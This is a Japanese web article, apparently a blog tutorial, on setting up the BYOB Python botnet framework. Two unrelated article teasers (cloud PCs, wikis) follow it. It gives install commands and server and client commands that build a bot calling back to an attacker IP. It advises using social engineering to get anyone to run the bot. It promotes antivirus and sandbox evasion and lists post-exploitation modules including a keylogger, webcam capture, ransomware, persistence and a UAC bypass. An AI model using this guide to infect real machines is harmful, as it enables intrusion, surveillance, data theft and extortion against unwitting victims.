独自のボットネットを構築する
BYOBは、セキュリティ研究者と開発者が基本的なボットネットを構築および運用して、毎年何百万ものデバイスに感染し、最新のボットネットを生成する高度なマルウェアの理解を深め、これらの脅威に対する対策を開発する能力を向上させるためのフレームワークを提供します。これは、開発者がRATまたはコマンド&コントロールサーバーを最初から作成することなく、独自のコードを簡単に実装し、クールな新機能を追加できるように設計されています。
機能
-
ディスクに何も書き込まれていません −クライアントはディスクに何も書き込みません-リモートインポートでは任意のコードを動的にメモリにロードし、現在実行中のプロセスに直接インポートできるため、一時ファイルも書き込みません。
-
プラットフォームに依存しない −すべてがPythonで記述されており、生成されたクライアントはオプションでポータブル実行可能ファイル(Windows)にコンパイルするか、スタンドアロンアプリケーションにバンドルすることができます。
-
ファイアウォールをバイパスする −クライアントはリバースTCP接続を介してコマンド&コントロールサーバーに接続します。デフォルトのフィルター構成は主に着信接続をブロックするため、ほとんどのファイアウォールをバイパスします。
-
ウイルス対策対策 −既知のウイルス対策製品の名前を持つプロセスが生成されないようにブロックすることにより、ウイルス対策による分析を回避します。
-
分析を防ぐためにペイロードを暗号化する −メインクライアントのペイロードは、一緒に生成されるペイロードステージャーにのみ存在するランダムな256ビットキーで暗号化されます。
-
リバースエンジニアリングの防止 −デフォルトでは、仮想マシンまたはサンドボックスが検出された場合、クライアントは実行を中止します。
インストール方法
-
git clone https://github.com/malwaredllc/byob.git
-
cd byob
-
pip install -r Requirements.txt
-
python setup.py
ここでは2つの端子が使用されます。最初の端末はセッションが処理されるボットサーバーであり、2番目の端末はボットが作成されるボットクライアントです。
-
python server.py –port 445
次に、別のLinuxターミナルを開き、cd / home / cybersecurity / Downloads / byob / byob
と入力します。 -
python client.py –name testbot.py 192.168.1.10(attacker ip)445
上記のクエリを実行すると、新しいボットネットが作成されます。上記のクエリが実行されます。これで、ソーシャルエンジニアリングのトリックを誰でも使用して、自分のコンピューターでボットを開くことができます。ターゲットマシンでtestbot.pyを実行すると、ボットネットサーバーにセッションが作成されます。
悪用後
被害者のボットネットの設定が成功した後、クライアントがリモートでインポートできるエクスプロイト後のモジュール。
-
キーロガー(byob.modules.keylogger):ユーザーのキーストロークと入力されたウィンドウ名をログに記録します
-
スクリーンショット(byob.modules.screenshot):現在のユーザーのデスクトップのスクリーンショットを撮ります
-
Webカメラ(byob.modules.webcam):ライブストリームを表示するか、Webカメラから画像/ビデオをキャプチャします
-
身代金(byob.modules.ransom):ファイルを暗号化し、身代金支払い用のランダムなBTCウォレットを生成します
-
パケットスニファ(byob.modules.packetsniffer):ホストネットワークとupload.pcapファイルでパケットスニファを実行します
-
永続性(byob.modules.persistence):ホストマシンで永続性を確立します
-
電話(byob.modules.phone):クライアントのスマートフォンからのテキストメッセージの読み取り/検索/アップロード
-
権限の昇格(byob.modules.escalate):UACバイパスを試行して、権限のない管理者権限を取得します
-
ポートスキャナー(byob.modules.portscanner):ローカルネットワークをスキャンして他のオンラインデバイスを探し、ポートを開きます
-
プロセス制御(byob.modules.process):ホスト上で現在実行中のプロセスを一覧表示/検索/強制終了/監視
-
独自のクラウドPCをセットアップする方法
どこからでもアクセスできるPCが必要な場合は、クラウドPCを試してみてください。どこにいてもファイルにアクセスできるようにすることも、強力なゲーミングPCを雇うこともできるので、現在のコンピューターでは決して実行することを夢見ていないゲームをプレイできます。 クラウドPCを雇って、好みに合わせて調整できるとしたらどうでしょうか。幸い、オンラインサービスとParsecアプリケーションの助けを借りればできます。 クラウドPCのセットアップ方法 まず、クラウドPCへのアクセスを提供するサービスを見つける必要があります。 Amazon AWSなど、利用可能な多くのオプションがあります。ただし、この
-
独自のWikiサイトを作成する方法
ウィキサイトの最大かつ最も成功した例の1つはウィキペディアであり、そのコンテンツは世界のさまざまな地域からのボランティアによって提供されています。また、ボランティアによって編集および保守され、誰でもサイトに貢献できます。これにより、毎月数億人の読者と250以上の言語の数百万の記事があり、世界で最も人気のあるWebサイトのトップ10の1つになっています。 ウィキは、プロジェクトで他の人とコミュニケーションを取り、作業するための優れたツールです。チームや組織がアイデアや計画を共有しながら、知識を収集してキャプチャし、複数のソースからコンテンツを収集するのに役立ちます。個人用ウィキでも組織用ウィキ